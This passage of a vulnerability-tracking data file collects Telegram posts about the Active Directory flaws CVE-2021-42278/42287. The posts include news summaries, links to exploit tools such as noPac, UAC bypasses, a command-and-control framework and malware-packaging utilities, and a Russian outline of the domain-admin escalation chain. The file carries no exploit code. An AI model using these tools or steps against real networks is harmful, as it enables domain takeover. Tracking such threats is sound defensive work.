\u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T09:37:15.000000Z"}, {"uuid": "3a28cb7e-810e-4870-bbe9-eaaafb1399c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2834", "content": "Tools\u00a0 \ud83d\udee0\ufe0f \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nMsSettingsDelegateExecute\n\nBypass UAC on Windows 10/11 x64 using ms-settings DelegateExecute registry key. This visual studio project will compile a static x64 binary to test this issue.\n\nhttps://github.com/hackerhouse-opensource/MsSettingsDelegateExecute\n\niscsicpl_bypassUAC\n\nUAC bypass for x64 Windows 7-11\n\nhttps://github.com/zha0gongz1/iscsicpl_bypassUAC\n\nSysmonEnte\n\nThis is a POC attack on the integrity of Sysmon which emits a minimal amount of observable events even if a SACL is in place.\n\nTo our understanding, this attack is difficult to detect in environments where no security sensors other than Sysmon or the Windows Event Log are in use.\n\nFor more technical information on the attack and possible mitigations, please see our blogpost.\n\nhttps://github.com/codewhitesec/SysmonEnte\n\nPico-PIO-USB.\n\nUSB host/device implementation using PIO of raspberry pi pico (RP2040).\n\nhttps://github.com/sekigon-gonnoc/Pico-PIO-USB\n\nuosint\n\nFind The Profiles Of A Person On Social Networks\n\nWith this tool, you can see all the information of the target person's social networks which is publicy available. Many people thik that this tool needs to be installed, so i will make a Telegram Bot so that information can be obtained more easily and there no need to install or do any other probles just simple and easy.\n\nhttps://github.com/uosint-project/uosint\n\nserver-status PWN\n\nA script that monitors and extracts requested URLs and clients connected to the service by exploiting publicly accessible Apache server-status instances.\n\nhttps://github.com/mazen160/server-status_PWN\n\nExploiting Misconfigured Apache server-status Instances with server-status_PWN:\nhttps://mazinahmed.net/blog/exploiting-misconfigured-apache-server-status-instances/\n\nChitchatter\n\nA free (as in both price and freedom) communication tool. It is designed with security and privacy in mind.\n\nhttps://github.com/jeremyckahn/chitchatter\n\nDemo:\nhttps://chitchatter.im/\n\nSwiss Cyber Defence\n\nExam Preparation for Cyber Security Specialist with Swiss Federal Diploma.\n\nhttps://github.com/phr85/swiss-cyber-defence\n\nnoPac\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user\n\nhttps://github.com/Ridter/noPac\n\n#cve #exploit\n\nVulnerable Web App\n\nsqli-postgres-rce-privesc-hacking-playground\n\nThis is free vulnerable app for novice pentesters & developers to experiment with SQL Injection vulnerability and privilege escalation.\n\nRecommended path:\n\u25ab\ufe0f exploit the SQLi vulnerability\n\u25ab\ufe0f get shell via vulnerable version of PostgreSQL\n\u25ab\ufe0f perform privilage escalation and become root \ud83e\udd42\n\nhttps://github.com/filipkarc/sqli-postgres-rce-privesc-hacking-playground\n\n#Tools\u00a0 \ud83d\udee0\ufe0f \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2023-04-03T08:51:04.000000Z"}, {"uuid": "7119ffff-f4f2-428a-91a9-7ec06969aec3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "Telegram/XQnuNd5X8XmOjKF9F0Yu3FlXocPy2dUR7xXCx3NP2hXIbzk", "content": "", "creation_timestamp": "2025-04-26T23:00:05.000000Z"}, {"uuid": "e5d67f83-504a-4c8f-9d11-58a5159ca04f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "Telegram/4OwSIIHM4Phzi6L1Q-57NlPfvr_pP-K8ZqCBqbr0RdiVmEc", "content": "", "creation_timestamp": "2025-04-29T17:00:10.000000Z"}, {"uuid": "8ea02106-a815-4d4d-aac4-2df675041204", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2621", "content": "#Tools -\u00a0 \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nConnect\n\nCommand and Control Framework\n\nhttps://github.com/skylerknecht/connect\n\nPackMyPayload\n\nEmerging Threat of Containerized Malware\n\nThis tool takes a file or directory on input and embeds them into an output file acting as an archive/container. It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with embedded malware, as well as helper for professional Red Team Operators to sharpen their Initial Access maneuvers.\n\nCurrently Threat Actors are known to smuggle their malware archived in various container file formats, to name a few:\n\n\u25ab\ufe0f 7zip\n\u25ab\ufe0f zip\n\u25ab\ufe0f ISO\n\u25ab\ufe0f IMG\n\nThey do that to get their payloads pass file content scanners, but more importantly to avoid having Mark-Of-The-Web flag on their files. There're various motives on why adversaries don't want MOTW on their files: Protected View in Microsoft Office was always among them.\n\nShould they provide container file to their victims, a foundation for disabling VBA macros in Internet-originated Office documents might be bypassed.\n\nhttps://github.com/mgeeky/PackMyPayload\n\nScoutSuite\n\nScout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, \n\nScout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.\n\n\u25ab\ufe0f https://github.com/nccgroup/ScoutSuite\n\u25ab\ufe0f https://github.com/nccgroup/sadcloud\n\nMsSettingsDelegateExecute\n\nBypass UAC on Windows 10/11 x64 using ms-settings DelegateExecute registry key. This visual studio project will compile a static x64 binary to test this issue.\n\nhttps://github.com/hackerhouse-opensource/MsSettingsDelegateExecute\n\niscsicpl_bypassUAC\n\nUAC bypass for x64 Windows 7-11\n\nhttps://github.com/zha0gongz1/iscsicpl_bypassUAC\n\nPico-PIO-USB.\n\nUSB host/device implementation using PIO of raspberry pi pico (RP2040).\n\nhttps://github.com/sekigon-gonnoc/Pico-PIO-USB\n\nserver-status PWN\n\nA script that monitors and extracts requested URLs and clients connected to the service by exploiting publicly accessible Apache server-status instances.\n\nhttps://github.com/mazen160/server-status_PWN\n\nExploiting Misconfigured Apache server-status Instances with server-status_PWN:\nhttps://mazinahmed.net/blog/exploiting-misconfigured-apache-server-status-instances/\n\nChitchatter\n\nA free (as in both price and freedom) communication tool. It is designed with security and privacy in mind.\n\nhttps://github.com/jeremyckahn/chitchatter\n\nDemo:\nhttps://chitchatter.im/\n\nSwiss Cyber Defence\n\nExam Preparation for Cyber Security Specialist with Swiss Federal Diploma.\n\nhttps://github.com/phr85/swiss-cyber-defence\n\nnoPac\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user\n\nhttps://github.com/Ridter/noPac\n\n#cve #exploit\n\nFsociety\n\nA Modular Penetration Testing Framework.\n\nhttps://github.com/fsociety-team/fsociety\n\nLORSRF\n\nlorsrf is just a web pen-testing tool that I wrote to find the parameters that can be used to find SSRF or Out-of-band resource load by adding OAST host like Burp Collaborator to the parameter value, above of all, the request that will be received in Burp Collaborator will be an HTTP request without any real pieces of information about the target, i was thinking about how can i get vulnerable parameter/endpoint , Hence i made a simple feature is that allowed you to add some pieces of information of the target in your OAST host as a variables\n\nhttps://github.com/knassar702/lorsrf\n\nEval 2 Term\n\nhttps://github.com/She11Way/eval2term\n\nJoin:\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory\n\nWebsite:\nwww.ghostclan.org\n\n#InsoSec #cybersec \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2023-03-22T08:38:32.000000Z"}, {"uuid": "66063d73-92d8-40bb-a726-7faec0b1d33f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "Telegram/8kfY5IrVwgv6d-jVaXidvd01teGjJ-EZbZhebbrlHOlDEw", "content": "", "creation_timestamp": "2021-12-21T02:40:26.000000Z"}, {"uuid": "2d07ae44-d75a-46f0-b99e-e5696c686a18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "Telegram/_JBB2P7ziQrNJ4Dse1MxmwqNvcRRxo6Hvl1KnPWFL1nmQa0", "content": "", "creation_timestamp": "2022-09-28T14:56:36.000000Z"}, {"uuid": "f0db1a2c-edf5-4e95-933b-f720fcf48f65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/542", "content": "#CVE-2021-42287 / #CVE-2021-42278 Scanner & Exploiter\nhttps://github.com/cube0x0/noPac\n\nimpersonate DA from standard domain user\nhttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2021-12-12T16:04:05.000000Z"}, {"uuid": "edef5c48-208f-4811-a075-5e1dbee675c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "Telegram/pGbiHzrv9DzUjPi4Cg4I-69JMs7D-lD3Hjj7tMRZSaPrsg", "content": "", "creation_timestamp": "2021-12-16T15:05:58.000000Z"}, {"uuid": "ee168a5a-82b6-45ad-a28f-9900a225b68c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "Telegram/ef4wbo4l4Rv2QiVrhNHWzlDYXi82eYKt40N4lamanJL8Uw", "content": "", "creation_timestamp": "2021-12-12T21:48:33.000000Z"}, {"uuid": "4a500335-9e9c-41c4-81da-0d49b71074c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/Tim_Mafia_Hackers_lslami/1691", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T10:47:50.000000Z"}, {"uuid": "311e81a7-9834-448d-86aa-19cd3b2c6c4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/RalfHackerChannel/1145", "content": "CVE-2021-42287/CVE-2021-42278: impersonate DA from standard domain user\n\n\u0421\u043a\u0430\u043d\u0435\u0440 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 C#:\nhttps://github.com/cube0x0/noPac\n\n\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 python \u0434\u043b\u044f \u043a\u0430\u043b\u0438:\nhttps://github.com/WazeHell/sam-the-admin \n\n#exploit #git #pentest #redteam", "creation_timestamp": "2022-01-31T01:28:15.000000Z"}, {"uuid": "351ebcf4-504d-495d-bcb8-f5b9a36cc4c2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/2464", "content": "\u200b\u200b\u0412\u044b\u0448\u0435\u0434\u0448\u0438\u0439 \u0432 \u0441\u0432\u0435\u0442 PoC \u0434\u043b\u044f CVE-2021-42287 \u0438 CVE-2021-42278 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u0443\u044e \u043e\u0431\u0435\u0441\u043f\u043e\u043a\u043e\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0443 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 Microsoft.\n \n\u0414\u0435\u043b\u043e \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u043d\u043e\u044f\u0431\u0440\u044c\u0441\u043a\u0438\u043c Patch Tuesday \u043e\u0448\u0438\u0431\u043a\u0438 Active Directory \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0434\u043e\u043c\u0435\u043d\u044b Windows.\n \nMicrosoft \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435\u0437\u0430\u043c\u0435\u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043e\u0431\u043e\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u043a\u0440\u0430\u0442\u0447\u0430\u0439\u0448\u0438\u0435 \u0441\u0440\u043e\u043a\u0438. IT-\u0433\u0438\u0433\u0430\u043d\u0442 \u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043b \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0435 \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e \u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u043f\u043e \u044d\u0442\u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u043c.\n \n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-42278 \u0441 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u043c\u0438 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0434\u0430\u0435\u0442 \u043e\u0431\u044b\u0447\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u043d\u0430 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0434\u043e 10 \u043c\u0430\u0448\u0438\u043d), \u0438 \u043a\u0430\u043a \u0435\u0433\u043e \u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446, \u043e\u043d \u0442\u0430\u043a\u0436\u0435 \u0438\u043c\u0435\u0435\u0442 \u043f\u0440\u0430\u0432\u0430 \u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0435\u0433\u043e \u0430\u0442\u0440\u0438\u0431\u0443\u0442 sAMAccountName.\n \n\u0412\u0442\u043e\u0440\u0430\u044f \u043e\u0448\u0438\u0431\u043a\u0430 CVE-2021-42287 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0445\u043e\u0434\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442 \u0430\u0442\u0440\u0438\u0431\u0443\u0442\u0430 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 Kerberos (PAC) \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u0434\u0430\u0432\u0430\u0442\u044c \u0441\u0435\u0431\u044f \u0437\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u044b \u0434\u043e\u043c\u0435\u043d\u0430. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0442\u043e\u043c\u0443, \u0447\u0442\u043e \u0446\u0435\u043d\u0442\u0440 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043a\u043b\u044e\u0447\u0435\u0439 (KDC) \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0431\u0438\u043b\u0435\u0442\u044b \u0441\u043b\u0443\u0436\u0431\u044b \u0441 \u0431\u043e\u043b\u0435\u0435 \u0432\u044b\u0441\u043e\u043a\u0438\u043c\u0438 \u0443\u0440\u043e\u0432\u043d\u044f\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439, \u0447\u0435\u043c \u0443 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u0434\u043e\u043c\u0435\u043d\u0430. \u042d\u0442\u043e \u0434\u043e\u0441\u0442\u0438\u0433\u0430\u0435\u0442\u0441\u044f \u0442\u0435\u043c, \u0447\u0442\u043e KDC \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0438\u0442\u044c, \u0434\u043b\u044f \u043a\u0430\u043a\u043e\u0439 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d \u0431\u0438\u043b\u0435\u0442 \u0441\u043b\u0443\u0436\u0431\u044b \u0441 \u0431\u043e\u043b\u0435\u0435 \u0432\u044b\u0441\u043e\u043a\u0438\u043c\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438.\n \n\u041e\u0431\u044a\u0435\u0434\u0438\u043d\u0438\u0432 \u043e\u0431\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043f\u0440\u044f\u043c\u043e\u0439 \u043f\u0443\u0442\u044c \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430 \u0432 \u0441\u0440\u0435\u0434\u0435 Active Directory, \u0433\u0434\u0435 \u0431\u0430\u0433\u0438 \u043d\u0435 \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u044b. \u041f\u043e \u0438\u0442\u043e\u0433\u0443 \u0430\u0442\u0430\u043a\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430, \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u043e\u043d\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u044e\u0442 \u043e\u0431\u044b\u0447\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f.\n \n\u041a\u0430\u043a \u0432\u0441\u0435\u0433\u0434\u0430, \u043c\u044b \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043d\u0430 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440\u0430\u0445 \u0434\u043e\u043c\u0435\u043d\u0430 \u0438 \u043d\u0435 \u0438\u0441\u043f\u044b\u0442\u044b\u0432\u0430\u0442\u044c \u0441\u0443\u0434\u044c\u0431\u0443.", "creation_timestamp": "2021-12-22T14:09:17.000000Z"}, {"uuid": "a332dbb4-9884-45de-8ba9-0fe9b97ca47e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/haccking/103098", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\n\u041e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0434\u043e\u043c\u0435\u043d\u0430 \u0434\u043e \u043f\u0440\u0430\u0432 \u0430\u0434\u043c\u0438\u043d\u0430: CVE-2021-42278, CVE-2021-42287", "creation_timestamp": "2021-12-20T10:01:10.000000Z"}, {"uuid": "5951347b-0079-4fd3-b1ce-7d08353207cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/1328", "content": "#CVE-2021\nCVE-2021-42287/CVE-2021-42278 Scanner & Exploiter.\n\nhttps://github.com/cube0x0/noPac\n\n@BlueRedTeam", "creation_timestamp": "2021-12-11T20:46:13.000000Z"}, {"uuid": "790b9e74-1b53-42b3-b8cf-241854cb862d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "seen", "source": "https://t.me/thehackernews/1747", "content": "Microsoft warns that two recently reported vulnerabilities \u2014 tracked as CVE-2021-42278 and CVE-2021-42287 \u2014 in Active Directory could be exploited by attackers to take over unpatched Windows domain controllers.\n\nDetails: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T08:04:04.000000Z"}, {"uuid": "8f816272-ee06-43c1-a9bb-2bcdf3cac7be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42287", "type": "published-proof-of-concept", "source": "https://t.me/haccking/11425", "content": "\u0421\u043f\u0443\u0444\u0438\u043d\u0433 sAMAccountName: \u043e\u0442 LowPriv \u0434\u043e \u0434\u043e\u043c\u0435\u043d \u0430\u0434\u043c\u0438\u043d\u0430 \u0437\u0430 \u0448\u0435\u0441\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434. CVE-2021-42278.\n\n#AD #pentest #\u0441\u0442\u0430\u0442\u044c\u044f@haccking\n\n\u041a\u0430\u043a \u043e\u043a\u0430\u0437\u0430\u043b\u043e\u0441\u044c, \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b Active Directory \u043d\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u044e\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0441\u0438\u043c\u0432\u043e\u043b\u0430 $ \u0432 \u043a\u043e\u043d\u0446\u0435 \u0438\u043c\u0435\u043d\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u043e\u0433\u043e \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430, \u0445\u043e\u0442\u044f \u0432\u0441\u0435 \u043c\u0430\u0448\u0438\u043d\u043d\u044b\u0435 \u0438\u043c\u0435\u043d\u0430 \u043e\u043a\u0430\u043d\u0447\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0438\u043c\u0435\u043d\u043d\u043e \u0438\u043c. \u042d\u0442\u043e\u0442 \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u00ab\u043d\u0435 \u0431\u0430\u0433, \u0430 \u0444\u0438\u0447\u0430\u00bb \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0432\u043f\u043e\u043b\u043d\u0435 \u0441\u0435\u0431\u0435 \u0431\u043e\u043b\u044c\u0448\u0438\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f\u043c \u0432 \u0441\u0432\u044f\u0437\u043a\u0435 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e CVE-2021-42287. \u0415\u0441\u043b\u0438 \u043c\u044b \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u0443\u0435\u043c \u043a\u0430\u043a\u043e\u0439-\u043d\u0438\u0431\u0443\u0434\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u0432 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u043b\u0435\u0440 \u0434\u043e\u043c\u0435\u043d\u0430, \u0437\u0430\u043f\u0440\u043e\u0441\u0438\u043c \u0434\u043b\u044f \u043d\u0435\u0433\u043e TGT, 